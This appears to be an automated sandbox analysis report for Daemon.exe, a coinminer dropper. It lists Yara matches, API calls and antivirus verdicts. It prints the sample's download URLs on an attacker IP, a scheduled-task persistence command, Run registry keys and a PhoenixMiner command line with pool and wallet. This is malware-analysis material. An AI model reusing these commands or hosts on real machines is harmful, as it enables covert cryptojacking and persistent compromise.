Summary | ZeroBOX

Daemon.exe

Process Kill CryptGenKey FindFirstVolume
Category Machine Started Completed
FILE s1_win7_x6401 March 9, 2021, 1:44 p.m. March 9, 2021, 1:46 p.m.
Size 908.5KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 dd3de309df5791a357534b613270ca3a
SHA256 68288944f411f451612a76069d22ba5ec804d649d992cafeb75bce96e8c7ae69
CRC32 62CB30E8
ssdeep 24576:wAHnh+eWsN3skA4RV1Hom2KXMmHafoKn5:nh+ZkldoPK8YafV
Yara
  • IsPE32 - (no description)
  • IsWindowsGUI - (no description)
  • HasDebugData - DebugData Check
  • HasRichSignature - Rich Signature Check
  • AutoIt - www.autoitscript.com/site/autoit/
  • CryptGenKey_Zero - CryptGenKey Zero
  • FindFirstVolume_Zero - FindFirstVolume Zero
  • inject_thread - Code injection with CreateRemoteThread in a remote process
  • network_http - Communications over HTTP
  • escalate_priv - Escalade priviledges
  • screenshot - Take screenshot
  • keylogger - Run a keylogger
  • win_registry - Affect system registries
  • win_token - Affect system token
  • win_files_operation - Affect private profile
  • Str_Win32_Winsock2_Library - Match Winsock 2 API library declaration
  • Str_Win32_Wininet_Library - Match Windows Inet API library declaration
  • Str_Win32_Internet_API - Match Windows Inet API call
  • Str_Win32_Http_API - Match Windows Http API call
  • Process_Snapshot_Kill_Zero - Process Kill Zero
  • PE_Header_Zero - PE File Signature Zero
  • OS_Processor_Check_Zero - OS Processor Check Signature Zero
  • Device_Check_Zero - Device Check Zero

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
164.124.101.2 Active Moloch
194.147.115.117 Active Moloch

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: SUCCESS: The scheduled task "WinWoW64" has successfully been created.
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
suspicious_features Connection to IP address suspicious_request GET http://194.147.115.117/zzztop/Daemon.exe
suspicious_features Connection to IP address suspicious_request GET http://194.147.115.117/zzztop/PhoenixMiner.exe
request GET http://194.147.115.117/zzztop/Daemon.exe
request GET http://194.147.115.117/zzztop/PhoenixMiner.exe
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 112
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72b62000
process_handle: 0xffffffff
1 0 0
file C:\ProgramData\DaemonL\Daemon.exe
file C:\ProgramData\DaemonL\PhoenixMiner.exe
cmdline C:\Windows\system32\cmd.exe /cschtasks /create /tn "WinWoW64" /tr "C:\ProgramData\DaemonL\Daemon.exe" /sc MINUTE /mo 1
cmdline schtasks /create /tn "WinWoW64" /tr "C:\ProgramData\DaemonL\Daemon.exe" /sc MINUTE /mo 1
file C:\ProgramData\DaemonL\PhoenixMiner.exe
Time & API Arguments Status Return Repeated

InternetReadFile

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $s’’RüÁRüÁRüÁCÁPüÁ̲;ÁSüÁ_@#ÁaüÁ_@ÁãüÁ_@ÁgüÁ[jÁ[üÁ[joÁwüÁRýÁrüÁçŒÁüÁçŒ#ÁSüÁ_@'ÁSüÁRkÁSüÁçŒ"ÁSüÁRichRüÁPEL¼ª_à"  àN €ð@÷^@€@@ÌÀ |€ ä‹4qÀ+ PK @ð„.textÝßà `.rdataŽýðþä@@.datatð Râ @À.rsrcä‹€ Œ4 @@.reloc4qrÀ @B
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@8º´ Í!¸LÍ!This program cannot be run in DOS mode. $ðDƒJ‘*ÐJ‘*ÐJ‘*Ðþ ÛÐD‘*Ðþ ÙÐñ‘*Ðþ ØÐU‘*ÐÔ1íÐB‘*ÐqÏ)ÑB‘*ÐqÏ.Ña‘*ÐqÏ/Ñʑ*ИÊ/ÑK‘*ÐQ €ÐK‘*ÐCé¹ÐN‘*ÐQ ÐZ‘*Ð$Ì/ÑO‘*ÐÝÏ.Ñe“*ЗnáÐ_‘*ÐJ‘+Ð8*ÐÝÏ/Ñ‘*ÐÝÏ*ÑK‘*ÐØÏÕÐK‘*ÐÝÏ(ÑK‘*ÐRichJ‘*ÐPEd†k›_ð" Ð=Ê;Œ 6@ày`à›p\<œpÜPyà°v0v`y´}`j€j(0#i”à=ðœ”p€.textÌÎ=Ð= `.rdataTÚ2à=Ü2Ô=@@.data´âÀp`°p@À.pdata0v°vxv@@.tls0yˆx@À.gfids<@yŠx@@.rsrcàPyšx@@.reloc´}`y~œx@B
request_handle: 0x00cc000c
1 1 0
section {u'size_of_data': u'0x00018c00', u'virtual_address': u'0x000c8000', u'entropy': 7.297773287958896, u'name': u'.rsrc', u'virtual_size': u'0x00018be4'} entropy 7.29777328796 description A section with a high entropy has been found
process daemon.exe
Time & API Arguments Status Return Repeated

Process32NextW

snapshot_handle: 0x000002e4
process_name: rundll32.exe
process_identifier: 2504
0 0

Process32NextW

snapshot_handle: 0x0000038c
process_name: rundll32.exe
process_identifier: 2504
0 0

Process32NextW

snapshot_handle: 0x0000038c
process_name: rundll32.exe
process_identifier: 2504
0 0

Process32NextW

snapshot_handle: 0x0000038c
process_name: rundll32.exe
process_identifier: 2504
0 0

Process32NextW

snapshot_handle: 0x0000038c
process_name: rundll32.exe
process_identifier: 2504
0 0

Process32NextW

snapshot_handle: 0x0000038c
process_name: rundll32.exe
process_identifier: 2504
0 0

Process32NextW

snapshot_handle: 0x0000038c
process_name: rundll32.exe
process_identifier: 2504
0 0

Process32NextW

snapshot_handle: 0x0000038c
process_name: rundll32.exe
process_identifier: 2504
0 0

Process32NextW

snapshot_handle: 0x0000038c
process_name: rundll32.exe
process_identifier: 2504
0 0

Process32NextW

snapshot_handle: 0x0000038c
process_name: rundll32.exe
process_identifier: 2504
0 0

Process32NextW

snapshot_handle: 0x0000038c
process_name: rundll32.exe
process_identifier: 2504
0 0

Process32NextW

snapshot_handle: 0x0000038c
process_name: rundll32.exe
process_identifier: 2504
0 0

Process32NextW

snapshot_handle: 0x0000038c
process_name: rundll32.exe
process_identifier: 2504
0 0

Process32NextW

snapshot_handle: 0x0000038c
process_name: rundll32.exe
process_identifier: 2504
0 0

Process32NextW

snapshot_handle: 0x0000038c
process_name: rundll32.exe
process_identifier: 2504
0 0

Process32NextW

snapshot_handle: 0x0000038c
process_name: rundll32.exe
process_identifier: 2504
0 0

Process32NextW

snapshot_handle: 0x0000038c
process_name: rundll32.exe
process_identifier: 2504
0 0

Process32NextW

snapshot_handle: 0x0000038c
process_name: rundll32.exe
process_identifier: 2504
0 0

Process32NextW

snapshot_handle: 0x0000038c
process_name: rundll32.exe
process_identifier: 2504
0 0

Process32NextW

snapshot_handle: 0x0000038c
process_name: rundll32.exe
process_identifier: 2504
0 0

Process32NextW

snapshot_handle: 0x0000038c
process_name: rundll32.exe
process_identifier: 2504
0 0

Process32NextW

snapshot_handle: 0x0000038c
process_name: rundll32.exe
process_identifier: 2504
0 0

Process32NextW

snapshot_handle: 0x0000038c
process_name: rundll32.exe
process_identifier: 2504
0 0

Process32NextW

snapshot_handle: 0x0000038c
process_name: rundll32.exe
process_identifier: 2504
0 0

Process32NextW

snapshot_handle: 0x0000038c
process_name: rundll32.exe
process_identifier: 2504
0 0

Process32NextW

snapshot_handle: 0x0000038c
process_name: rundll32.exe
process_identifier: 2504
0 0

Process32NextW

snapshot_handle: 0x0000038c
process_name: rundll32.exe
process_identifier: 2504
0 0

Process32NextW

snapshot_handle: 0x0000038c
process_name: rundll32.exe
process_identifier: 2504
0 0

Process32NextW

snapshot_handle: 0x0000038c
process_name: rundll32.exe
process_identifier: 2504
0 0

Process32NextW

snapshot_handle: 0x0000038c
process_name: rundll32.exe
process_identifier: 2504
0 0

Process32NextW

snapshot_handle: 0x0000038c
process_name: rundll32.exe
process_identifier: 2504
0 0

Process32NextW

snapshot_handle: 0x0000038c
process_name: rundll32.exe
process_identifier: 2504
0 0

Process32NextW

snapshot_handle: 0x0000038c
process_name: rundll32.exe
process_identifier: 2504
0 0

Process32NextW

snapshot_handle: 0x0000038c
process_name: rundll32.exe
process_identifier: 2504
0 0

Process32NextW

snapshot_handle: 0x0000038c
process_name: rundll32.exe
process_identifier: 2504
0 0

Process32NextW

snapshot_handle: 0x0000038c
process_name: rundll32.exe
process_identifier: 2504
0 0

Process32NextW

snapshot_handle: 0x0000038c
process_name: rundll32.exe
process_identifier: 2504
0 0

Process32NextW

snapshot_handle: 0x0000038c
process_name: rundll32.exe
process_identifier: 2504
0 0

Process32NextW

snapshot_handle: 0x0000038c
process_name: rundll32.exe
process_identifier: 2504
0 0

Process32NextW

snapshot_handle: 0x0000038c
process_name: rundll32.exe
process_identifier: 2504
0 0

Process32NextW

snapshot_handle: 0x0000038c
process_name: rundll32.exe
process_identifier: 2504
0 0

Process32NextW

snapshot_handle: 0x0000038c
process_name: rundll32.exe
process_identifier: 2504
0 0

Process32NextW

snapshot_handle: 0x0000038c
process_name: rundll32.exe
process_identifier: 2504
0 0

Process32NextW

snapshot_handle: 0x0000038c
process_name: rundll32.exe
process_identifier: 2504
0 0

Process32NextW

snapshot_handle: 0x0000038c
process_name: rundll32.exe
process_identifier: 2504
0 0

Process32NextW

snapshot_handle: 0x0000038c
process_name: rundll32.exe
process_identifier: 2504
0 0

Process32NextW

snapshot_handle: 0x0000038c
process_name: rundll32.exe
process_identifier: 2504
0 0

Process32NextW

snapshot_handle: 0x0000038c
process_name: rundll32.exe
process_identifier: 2504
0 0

Process32NextW

snapshot_handle: 0x0000038c
process_name: rundll32.exe
process_identifier: 2504
0 0

Process32NextW

snapshot_handle: 0x0000038c
process_name: rundll32.exe
process_identifier: 2504
0 0
url https://ssl.pstatic.net/tveta/libs/1287/1287046/6df1cc02334922baa2d4_20200806172035021.jpg
url https://ssl.pstatic.net/static/pwe/common/img_use_mobile_version.png
url https://fonts.gstatic.com/s/lato/v16/S6uyw4BMUTPHjx4wWA.woff
url http://google.com/
url https://s.pstatic.net/dthumb.phinf/?src=%22http%3A%2F%2Fstatic.naver.net%2Fwww%2Fmobile%2Fedit%2F2020%2F0805%2FcropImg_339x222_38528621599152653.jpeg%22
url https://s.pstatic.net/static/www/mobile/edit/2020/0804/cropImg_728x360_38481254551659019.jpeg
url https://ssl.pstatic.net/tveta/libs/assets/js/common/min/probe.min.js
url https://s.pstatic.net/dthumb.phinf/?src=%22http%3A%2F%2Fstatic1.naver.net%2Fwww%2Fmobile%2Fedit%2F2020%2F0806%2FcropImg_222x145_38626953912837677.png%22
url https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
url http://search.naver.com/search.naver?sm=tab_hty.top
url http://www.snee.com/xml/xslt/sample.doc
url http://www.yceml.net/0559/10408495-1499411010011
url https://s.pstatic.net/static/www/mobile/edit/2018/0206/cropImg_166x108_118371466370743504.jpeg
url https://s.pstatic.net/static/newsstand/up/2020/0615/nsd10319824.png
url https://fonts.gstatic.com/s/catamaran/v7/o-0bIpQoyXQa2RxT7-5B6Ryxs2E_6n1iPHjd5a7dvQ.woff
url https://s.pstatic.net/dthumb.phinf/?src=%22http%3A%2F%2Fstatic.naver.net%2Fwww%2Fmobile%2Fedit%2F2020%2F0805%2FcropImg_339x222_38552809772500435.jpeg%22
url https://t1.daumcdn.net/tistory_admin/blogs/plugins/tatterDesk/js/src/controls.js?_version_=9024c9023ed6ab26b00b4f2905e46ffa08aeb336
url https://ssl.pstatic.net/static/pwe/nm/b.gif
url https://castbox.shopping.naver.com/js/lazyload.js
url https://s.pstatic.net/shopping.phinf/20200729_1/2931dd60-1842-4048-a39c-1e3389db4a0e.jpg
url https://ssl.pstatic.net/static/pwe/nm/spr_vertical_0d25bb77f8.png
url https://s.pstatic.net/dthumb.phinf/?src=%22http%3A%2F%2Fstatic.naver.net%2Fwww%2Fmobile%2Fedit%2F2020%2F0805%2Fmobile_17061525298c.jpg%22
url https://s.pstatic.net/static/newsstand/2020/logo/light/0604/042.png
url https://s.pstatic.net/static/newsstand/2020/logo/light/0604/955.png
url https://s.pstatic.net/static/newsstand/2020/logo/light/0604/056.png
url http://www.buzzadnetwork.com/jump/next.php?stamat=m%7CM-4iM-4jaQdHQBH0dEdHP3xP.0e7%2CboDB7XrVJDfRqYwVNhmAc8QRCrIuseXl_bWuTf_latOFYiGEzPpb7ikp5t8RPmTHyMRYDe1i9EJZLC6LSuccW1-YPggnMxkcwVirdNVGfgK3hFUbeKvFvqNv0-u8VxfrNUFB1gFhMN_8GLCn1znxf5_p0FJe0MYRI7nbfyajoqg_H3fvzrjsMsC0vAMYn2un8v5vcBfzwM-DewoZ7WId7geGlrySfAHx5KiJ5Hm90CU%2C
url https://s.pstatic.net/shopping.phinf/20200720_22/e2297359-375a-403a-86c5-44ff86c708fc.jpg
url https://t1.daumcdn.net/tistory_admin/blogs/plugins/PreventCopyContents/js/functions.js?_version_=9024c9023ed6ab26b00b4f2905e46ffa08aeb336
url https://ssl.pstatic.net/tveta/libs/1298/1298853/743c01d46e807a376d99_20200730182507675.png
url https://tistory3.daumcdn.net/tistory/807805/skin/images/footerbg.jpg
url https://s.pstatic.net/static/newsstand/2020/logo/light/0604/820.png
url https://file-examples-com.github.io/uploads/2017/02/file-sample_1MB.doc
url https://s.pstatic.net/static/newsstand/2020/logo/light/0604/825.png
url https://s.pstatic.net/static/newsstand/2020/logo/light/0604/327.png
url https://fonts.gstatic.com/s/catamaran/v7/o-0bIpQoyXQa2RxT7-5B6Ryxs2E_6n1iPHjc5a7dvQ.woff
url http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
url https://mail.naver.com/js_src/com/nhncorp/mail/write/se2_new/smart_editor2_inputarea_ie8.html?version=20190704
url https://static.nid.naver.com/loginv3/img/sp_login_20150113.gif
url https://s.pstatic.net/static/newsstand/2020/logo/light/0604/031.png
url https://tpc.googlesyndication.com/pagead/images/abg/icon.png
url https://search.pstatic.net/common/?src=http%3A%2F%2Fcafefiles.naver.net%2FMjAxNzExMDdfODcg%2FMDAxNTEwMDY0OTYzNTA5.y-bJj3BgRC8r80hM6EblWFHSqawqo5-vMJAzHBN6rEkg.vAPtUzoeY8mHPRaMuejD3HrMtW5xgv-cdeEaAc0q2Rog.PNG.flashcs7%2FScreenshot_2017-11-07-22-55-08.png%23600x1024
url https://www.gstatic.com/m/images/sy_stars_9.gif
url https://t1.daumcdn.net/tistory_admin/blogs/plugins/tatterDesk/js/src/dragdrop.js?_version_=9024c9023ed6ab26b00b4f2905e46ffa08aeb336
url https://phinf.pstatic.net/contact/20190113_166/1547312816315t3o9l_JPEG/image.JPEG?type=s80
url https://www.naver.com
url https://t1.daumcdn.net/tistory_admin/blogs/style/menubar.css?_version_=9024c9023ed6ab26b00b4f2905e46ffa08aeb336
url https://tpc.googlesyndication.com/pagead/js/r20180205/r20110914/abg.js
url https://s.pstatic.net/static/newsstand/2020/logo/light/0604/024.png
url https://c.microsoft.com/ms.js
url https://s.pstatic.net/shopping.phinf/20200806_26/3cad46ab-3fa4-4756-9e01-d61372890bd0.jpg
description Code injection with CreateRemoteThread in a remote process rule inject_thread
description Hijack network configuration rule hijack_network
description Create a windows service rule create_service
description Create a COM server rule create_com_service
description Communications over UDP network rule network_udp_sock
description Listen for incoming communication rule network_tcp_listen
description Communications over Toredo network rule network_toredo
description Communications over P2P network rule network_p2p_win
description Communications over HTTP rule network_http
description File downloader/dropper rule network_dropper
description Communications over FTP rule network_ftp
description Communications over RAW socket rule network_tcp_socket
description Communications use DNS rule network_dns
description Communication using dga rule network_dga
description Escalade priviledges rule escalate_priv
description Take screenshot rule screenshot
description Run a keylogger rule keylogger
description Steal credential rule cred_local
description Record Audio rule sniff_audio
description APC queue tasks migration rule migrate_apc
description Malware can spread east-west file rule spreading_file
description Malware can spread east-west using share drive rule spreading_share
description Create or check mutex rule win_mutex
description Affect system registries rule win_registry
description Affect system token rule win_token
description Affect private profile rule win_private_profile
description Affect private profile rule win_files_operation
description Match Winsock 2 API library declaration rule Str_Win32_Winsock2_Library
description Match Windows Inet API library declaration rule Str_Win32_Wininet_Library
description Match Windows Inet API call rule Str_Win32_Internet_API
description Match Windows Http API call rule Str_Win32_Http_API
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__ConsoleCtrl
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description (no description) rule Check_Dlls
description Checks if being debugged rule anti_dbg
description Anti-Sandbox checks for ThreatExpert rule antisb_threatExpert
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
description Code injection with CreateRemoteThread in a remote process rule inject_thread
description Create a windows service rule create_service
description Communications over UDP network rule network_udp_sock
description Listen for incoming communication rule network_tcp_listen
description Communications over P2P network rule network_p2p_win
cmdline C:\Windows\system32\cmd.exe /cschtasks /create /tn "WinWoW64" /tr "C:\ProgramData\DaemonL\Daemon.exe" /sc MINUTE /mo 1
cmdline schtasks /create /tn "WinWoW64" /tr "C:\ProgramData\DaemonL\Daemon.exe" /sc MINUTE /mo 1
host 194.147.115.117
file C:\Users\test22\AppData\Local\Temp\SandboxieInstall.exe
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Win32 SystemNetwork Application reg_value C:\ProgramData\DaemonL\Daemon.exe
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Win32 SystemNetwork Application reg_value C:\ProgramData\DaemonL\Daemon.exe
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Win32 SystemNetwork Application reg_value C:\ProgramData\DaemonL\Daemon.exe
reg_key HKEY_CURRENT_USER\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Win32 SystemNetwork Application reg_value C:\ProgramData\DaemonL\Daemon.exe
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Win32 SystemNetwork Application reg_value C:\ProgramData\DaemonL\Daemon.exe
cmdline C:\Windows\system32\cmd.exe /cschtasks /create /tn "WinWoW64" /tr "C:\ProgramData\DaemonL\Daemon.exe" /sc MINUTE /mo 1
cmdline schtasks /create /tn "WinWoW64" /tr "C:\ProgramData\DaemonL\Daemon.exe" /sc MINUTE /mo 1
cmdline "C:\ProgramData\DaemonL\PhoenixMiner.exe" -pool stratum+tcp://eu.emcd.io:7777 -pool2 stratum+tcp://eu2.emcd.io:7777 -wal patriot.hi -gpow 30 -gt 6 -log 0
cmdline C:\ProgramData\DaemonL\PhoenixMiner.exe -pool stratum+tcp://eu.emcd.io:7777 -pool2 stratum+tcp://eu2.emcd.io:7777 -wal patriot.hi -gpow 30 -gt 6 -log 0
url http://194.147.115.117/zzztop/PhoenixMiner.exe
url http://194.147.115.117/zzztop/Daemon.exe
Process injection Process 112 resumed a thread in remote process 2488
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000390
suspend_count: 1
process_identifier: 2488
1 0 0
Bkav W32.AIDetect.malware2
MicroWorld-eScan Trojan.GenericKD.35178963
FireEye Generic.mg.dd3de309df5791a3
McAfee RDN/Generic.grp
Cylance Unsafe
Sangfor Trojan.Win32.Save.a
Alibaba Trojan:Win32/Miner.47288b53
K7GW Riskware ( 0040eff71 )
K7AntiVirus Riskware ( 0040eff71 )
Arcabit Trojan.Generic.D218C9D3
Cyren W32/Trojan.OEMZ-1530
Symantec Trojan.Gen.MBT
APEX Malicious
Avast Win32:Malware-gen
Kaspersky Trojan.Win32.Miner.asymy
BitDefender Trojan.GenericKD.35178963
NANO-Antivirus Trojan.Win32.Miner.ibsfzb
Paloalto generic.ml
ViRobot Trojan.Win32.S.Downloader.930304
Tencent Win32.Trojan.Miner.Wskb
Ad-Aware Trojan.GenericKD.35178963
Sophos Mal/Generic-S
Comodo Malware@#1j0dbpw0m95gv
F-Secure Heuristic.HEUR/AGEN.1100129
DrWeb Trojan.Siggen10.65501
VIPRE Trojan.Win32.Generic!BT
TrendMicro TROJ_GEN.R06BC0PKF20
McAfee-GW-Edition BehavesLike.Win32.TrojanAitInject.dh
Emsisoft Trojan.CoinMiner (A)
Webroot W32.Trojan.Gen
Avira HEUR/AGEN.1100129
eGambit Unsafe.AI_Score_94%
Gridinsoft Trojan.Win32.CoinMiner.oa
Microsoft Trojan:Win32/Masson.A!rfn
AegisLab Hacktool.Win32.Gamehack.3!e
ZoneAlarm Trojan.Win32.Miner.asymy
GData Trojan.GenericKD.35178963
Cynet Malicious (score: 90)
AhnLab-V3 Malware/Win32.Generic.C4225435
VBA32 Trojan.Script
ALYac Trojan.GenericKD.35178963
MAX malware (ai score=100)
Malwarebytes Generic.Malware/Suspicious
ESET-NOD32 a variant of Win32/CoinMiner.CFD
TrendMicro-HouseCall TROJ_GEN.R06BC0PKF20
Ikarus Trojan.Win32.CoinMiner
MaxSecure Trojan.Malware.300983.susgen
Fortinet AutoIt/Agent.OUJ!tr.dldr
AVG Win32:Malware-gen
Cybereason malicious.9df579